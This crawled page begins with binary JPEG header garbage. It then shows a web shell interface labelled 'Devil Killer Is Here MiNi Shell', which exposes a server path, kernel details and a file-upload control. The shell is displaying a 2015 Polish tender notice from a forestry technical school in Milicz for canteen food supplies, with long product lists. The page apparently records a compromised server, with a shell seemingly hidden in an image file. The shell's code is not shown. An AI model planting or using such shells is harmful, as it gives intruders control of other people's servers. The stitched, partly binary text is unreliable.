JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151217/346300-N-2015.html

<p class="kh_header"><b>Milicz: Dostawa artykułów spożywczych do stołówki TL w Miliczu</b><br>
<b>Numer ogłoszenia: 346300 - 2015; data zamieszczenia: 17.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Technikum Leśne w Miliczu , ul. Kasztelańska 1, 56-300 Milicz, woj. dolnośląskie, tel. 71 3840718, faks 71 3840718.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tlmilicz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: szkoła Ministra Środowiska.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych do stołówki TL w Miliczu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa do stołówki Technikum Leśnego w Miliczu, ul. Aleja ZHP 1, sypkich artykułów spożywczych, półproduktów suchych, nabiału, ziemniaków, mięsa i wędlin oraz pieczywa i ciasta, wyszczególnionych w układzie asortymentowo - ilościowym.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających nie przekraczającego 20% udzielonego zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.50.00.00-3, 15.81.00.00-9, 15.22.00.00-6, 15.30.00.00-1, 15.80.00.00-6, 15.11.00.00-2, 15.13.00.00-8, 15.11.20.00-6, 15.89.60.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie przewidziano</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena warunków wymaganych od oferentów zostanie dokonana według formuły  spełnia - nie spełnia. Niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem oferenta.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>j.w.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>j.w.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>j.w.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>j.w.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Wymóg pisemnej gwarancji na ręczne wykonanie produktów z pakietu nr 12
Potwierdzenie chowu ściółkowego dla pakietu 10</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykaz środków transportu przewidywanych do realizacji zamówienia z załączoną kserokopią wpisu dokonanego przez PPIS do książki kontroli sanitarnej pojazdu o wyrażeniu zgody na transport artykułów spożywczych lub kserokopią decyzji PPIS o dopuszczeniu pojazdów do przewozu żywności (Rozporządzenie Ministra Zdrowia z dnia 19.12.2002 r. - Dz. U. z 2003 r. nr 21 poz 179). W wykazie należy podać typ, markę i numer rejestracyjny pojazdu oraz status własności (pojazd własny, dzierżawiony lub inny)- dotyczy wszystkich zadań z wyjątkiem dostaw warzyw nieprzetworzonych oraz jaj.
Wykonawca dostarczający warzywa nieprzetworzone oraz jaja, nie musi okazywać kserokopii wskazanego dokumentu. 
Kopię wydanego przez akredytowany podmiot certyfikatu potwierdzającego, że Wykonawca spełnia wymagania systemu bezpieczeństwa zdrowotnego żywności HACCP, a w przypadku nieposiadania takiego certyfikatu podpisane przez Wykonawcę oświadczenie, że WYKONAWCA wdrożył zasady i spełnia wymagania, o których mowa w ustawie o bezpieczeństwie żywności i żywienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tlmilicz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Technikum Leśne w Miliczu, ul. Kasztelańska 1, 56 - 300 Milicz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.12.2015 godzina 12:00, miejsce: Sekretariat Technikum Leśnego w Miliczu, ul. Kasztelańska 1, 56 - 300 Milicz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Produkty Mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Deser (Danio lub podob.)	szt.	2 000	5%	 
Jogurt 150 ml	szt.	5 000	5%	 
Jogurt pitny 400 ml	szt.	600	5%	 
Kefir 	l.	100	5%	 
Margaryna mleczna	kg.	100	5%	 
Margaryna Rama (w płynie)	l.	50	5%	 
Margaryna zwykła	kg.	200	5%	 
Masło roślinne	kg.	50	5%	 
Masło śmietankowe 	kg.	1 500	5%	 
Maślanka 1l	l.	100	5%	 
Maślanka owocowa	l.	100	5%	 
Mleko 2% 	l.	2 500	5%	 
Mleko 3,2% karton	l.	100	5%	 
Oscypek	kg.	50	5%	 
Ser brie 100g	szt.	200	5%	 
Ser camembert 100g	szt.	200	5%	 
Ser feta	kg.	10	5%	 
Ser mozzarella	kg.	10	5%	 
Ser topiony bloczek 100g	kg.	50	5%	 
Ser topiony krążek (8 w opak)	szt.	1 500	5%	 
Ser topiony plastry (8 w opak)	szt.	3 300	5%	 
Ser topiony smażony	kg.	100	5%	 
Ser żółty (rożne gat.)	kg.	800	5%	 
Ser żółty (rożne gat.) krojony	kg.	100	5%	 
Ser żółty wędzony	kg.	100	5%	 
Serek homogenizowany 100g	szt.	5 000	5%	 
Serek kiri 100g	szt.	50	5%	 
Śmietana 12%	l.	1 000	5%	 
Śmietana 18%	l.	50	5%	 
Śmietana 30%	l.	400	5%	 
Twaróg półtłusty	kg.	750	5%	 

Produkty muszą spełniać Rozporządzenie Ministra Zdrowia z 26.08.2015. (DU poz.1256).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bułka długa 300g	szt.	50	5%
Bułka drożdżówka (z owocami)	szt.	8 000	8%
Bułka grahamka 50g	szt.	11 000	5%
Bułka na zapiekanki 100g	szt.	1 000	5%
Bułka tarta	kg.	300	5%
Bułka zwykła 50g	szt.	70 000	5%
Chleb graham 500g	szt.	1 000	5%
Chleb krojony 0,9 kg	szt.	5 000	5%
Chleb wiejski 2 kg.	szt.	20	5%
Chleb wieloziarnisty 500g	szt.	1 000	5%
Chleb słonecznikowy 500g	szt.	1 000	5%
Ciasto drożdżowe z owocami sezonowymi	kg.	200	8%
Pączek	szt.	500	8%
Rogal 	szt.	1 000	8%
Produkty muszą spełniać Rozporządzenie Ministra Zdrowia z 26.08.2015. (DU poz.1256).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Ryby świeże i mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filety - dorsz*	kg.	500	5%
Filety - mintaj*	kg.	100	5%
Filety - miruna*	kg.	100	5%
Filety - morszczuk*	kg.	100	5%
Karp żywy	kg.	100	5%
Makrela wędzona	kg.	150	5%
Pstrąg świeży	kg.	100	5%
Sałatka śledziowa	kg.	150	5%
Śledź matias	kg.	20	5%
Śledź po wiejsku	kg.	50	5%
* Ryby mrożone z max 10% glazury			
Produkty muszą spełniać Rozporządzenie Ministra Zdrowia z 26.08.2015. (DU poz.1256).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Warzywa, owoce krajowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Arbuz	kg.	200	5%
Botwinka	pęcz.	100	5%
Brokuły	kg.	100	5%
Brukselka	kg.	100	5%
Brzoskwinie krajowe	kg.	200	5%
Buraki czerwone	kg.	1 700	5%
Cebula	kg.	1 000	5%
Cukinia	kg.	100	5%
Czosnek krajowy	szt.	250	5%
Fasolka szparagowa	kg.	100	5%
Gruszki	kg.	400	5%
Jabłka	kg.	2 000	5%
Jagody	kg.	50	5%
Kabaczek	kg.	100	5%
Kalafior	szt.	300	5%
Kalarepa	szt.	50	5%
Kapusta biała	kg.	2 500	5%
Kapusta czerwona	kg.	500	5%
Kapusta kiszona	kg.	1 800	8%
Kapusta pekińska	kg.	700	5%
Kapusta włoska	kg.	200	5%
Koper zielony	pęcz.	1 200	5%
Kukurydza kolby	szt.	500	5%
Maliny	kg.	20	5%
Marchew	kg.	2 200	5%
Morele 	kg.	200	5%
Ogórki kiszone	kg.	500	8%
Ogórki zielone gruntowe	kg.	100	5%
Ogórki zielone szklarniowe	kg.	1 200	5%
Papryka	kg.	300	5%
Pietruszka korzeń	kg.	400	5%
Pietruszka zielona	pęcz.	1 200	5%
Pomidory gruntowe	kg.	200	5%
Pomidory szklarniowe	kg.	2 000	5%
Por	kg.	250	5%
Porzeczka czarna	kg.	200	5%
Rzepa czarna	kg.	50	5%
Rzodkiew biała	kg.	50	5%
Rzodkiewka	pęcz.	500	5%
Sałata	szt.	600	5%
Sałata lodowa	szt.	50	5%
Seler	kg.	1 000	5%
Szczypior	pęcz.	1 200	5%
Śliwki krajowe	kg.	300	5%
Truskawki	kg.	100	5%
Ziemniaki	kg.	18 000	5%.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ananas puszka	kg.	60	8%	 
Bazylia	kg.	2	23%	 
Brzoskwinia puszka	kg.	20	8%	 
Budyń 	kg.	10	8%	 
Chipsy z bananów	kg.	5	8%	 
Chrzan tarty	kg.	110	8%	 
Ciastka deserowe delicje lub równoważne	kg.	30	23%	 
Ciastka deserowe markizy lub równoważne	kg.	40	23%	 
Cukier	kg.	1 000	8%	 
Cukier puder	kg.	2	8%	 
Cukier waniliowy 	kg.	3	23%	 
Curry 	kg.	5	23%	 
Cynamon	kg.	3	23%	 
Czosnek granulowany	kg.	30	8%	 
Ćwikła	kg.	10	8%	 
Dżem  (opak. jednorazowe)	szt.	1 000	8%	 
Dżem ananasowy	l.	150	8%	 
Dżem brzoskwinia	l.	150	8%	 
Dżem czarna porzeczka	l.	150	8%	 
Dżem wiśnia	l.	150	8%	 
Fasola biała drobna	kg.	150	5%	 
Fasola biała Jaś gruby 	kg.	150	5%	 
Fasola konserwowa biała 	kg.	30	8%	 
Fasola konserwowa czerwona 	kg.	60	8%	 
Flaki opak 	kg.	20	5%	 
Frytura palmowa	kg.	600	5%	 
Galaretka owocowa (mix)	kg.	20	23%	 
Gałka muszkatołowa	kg.	1	23%	 
Goździki	kg.	1	23%	 
Groch łuskany	kg.	250	5%	 
Groszek konserwowy	kg.	50	8%	 
Groszek ptysiowy	kg.	20	8%	 
Grzanki 	kg.	50	8%	 
Herbata granulowana 	kg.	50	23%	 
Herbata Lipton torebki 100szt	szt.	25	23%	 
Herbata liściasta el grey 100g	szt.	200	23%	 
Herbata liściasta Madras 100g	szt.	200	23%	 
Jałowiec	kg.	2	23%	 
Kakao 200g	szt.	100	23%	 
Kakao rozpuszczalne 500g	szt.	10	23%	 
Kasza gryczana	kg.	100	5%	 
Kasza jęczmienna	kg.	400	5%	 
Kasza manna	kg.	10	5%	 
Kawa Inka 	kg.	10	8%	 
Kawa rozpuszczalna Jacobs Cronat Gold 200g	szt.	24	23%	 
Kawa rozpuszczalna Maxwell 100g lub równoważna	szt.	60	23%	 
Kawa Woseba mielona lub równoważna	kg.	10	23%	 
Kawa ziarnista Jacobs Kronung 	kg.	36	23%	 
Ketchup 1 L	l.	300	8%	 
Kisiel	kg.	20	8%	 
Kminek	kg.	2	23%	 
Konserwa mięsna (gulasz angielski 160g)	szt.	800	5%	 
Konserwa rybna 170g (szprot, śledź)	szt.	1 000	5%	 
Koper suszony	kg.	2	8%	 
Kukurydza konserwowa	kg.	200	8%	 
Kurkuma 	kg.	2	23%	 
Kwasek cytrynowy 20 g	szt.	150	23%	 
Liść laurowy	kg.	3	23%	 
Majeranek	kg.	12	8%	 
Majonez słoik 700 ml Winiary	szt.	80	8%	 
Majonez wiadro 3kg Winiary 	szt.	150	8%	 
Makaron durum gniazda szerokie 	kg.	50	5%	 
Makaron durum kokardka 	kg.	50	5%	 
Makaron ryżowy	kg.	20	5%	 
Makarony  (różne rodzaje kształtu)	kg.	500	5%	 
Makarony (100% durum - różne rodzaje kształtu)	kg.	1 200	5%	 
Marmolada twarda	kg.	10	8%	 
Mąka tortowa 1 kg	kg.	300	5%	 
Mąka wrocławska 1 kg	kg.	300	5%	 
Mąka ziemniaczana 1 kg	kg.	100	8%	 
Migdały płatki	kg.	3	23%	 
Miód naturalny 	kg.	650	5%	 
Miód naturalny (opak. jednorazowe)	szt.	500	5%	 
Morele puszka	kg.	20	8%	 
Morele suszone	kg.	5	8%	 
Musztarda (1 kg)	kg.	120	23%	 
Napój owocowy karton 2,0 l	szt.	500	23%	 
Natka pietruszki suszona	kg.	2	8%	 
Ocet 0.5 l	szt.	120	23%	 
Ocet balsamiczny	l.	20	8%	 
Ocet jabłkowy	l.	10	8%	 
Ocet winny	l.	20	8%	 
Ogórki konserwowe 	kg.	400	8%	 
Olej roślinny 1 L	l.	400	5%	 
Oliwa z oliwek	l.	10	8%	 
Oliwki czarne	l.	10	8%	 
Oliwki zielone	l.	10	8%	 
Oregano	kg.	2	23%	 
Orzechy laskowe	kg.	5	23%	 
Orzechy włoskie łuskane	kg.	5	23%	 
Orzeszki ziemne	kg.	5	8%	 
Owoce kandyzowane	kg.	5	23%	 
Paczka mikołajkowa ze słodyczami (25zł brutto)	szt.	250	23%	 
Paluszki słone 100 g	szt.	50	23%	 
Papryka chilli	kg.	2	23%	 
Papryka konserwowa	kg.	200	8%	 
Papryka mielona ostra	kg.	2	23%	 
Papryka mielona słodka	kg.	20	23%	 
Paprykarz szczeciński	kg.	50	5%	 
Pasta pomidorowa 30% puszka (ok 1 kg)	szt.	100	8%	 
Pasta pomidorowa 30% puszka (ok 4 kg)	szt.	50	8%	 
Pasztet drobiowy 160g	szt.	1 600	5%	 
Pasztet wieprzowy ok. 1kg.	kg.	50	5%	 
Peperonata	kg.	20	8%	 
Pestki dyni łuskane	kg.	5	23%	 
Pieczarki marynowane	kg.	50	8%	 
Pieprz cytrynowy	kg.	2	23%	 
Pieprz kolorowy	kg.	2	23%	 
Pieprz młotkowany	kg.	2	23%	 
Pieprz naturalny 1 kg. (mielony)	kg.	35	23%	 
Pieprz naturalny 1 kg. (ziarnisty)	kg.	20	23%	 
Pieprz ziołowy	kg.	5	8%	 
Pierożki tortellini 	kg.	5	8%	 
Płatki jęczmienne	kg.	30	5%	 
Płatki kukurydziane	kg.	15	5%	 
Płatki kukurydziane czekoladowe	kg.	80	5%	 
Płatki owsiane błyskawiczne	kg.	30	5%	 
Płatki owsiane górskie	kg.	30	5%	 
Płatki żytnie	kg.	30	5%	 
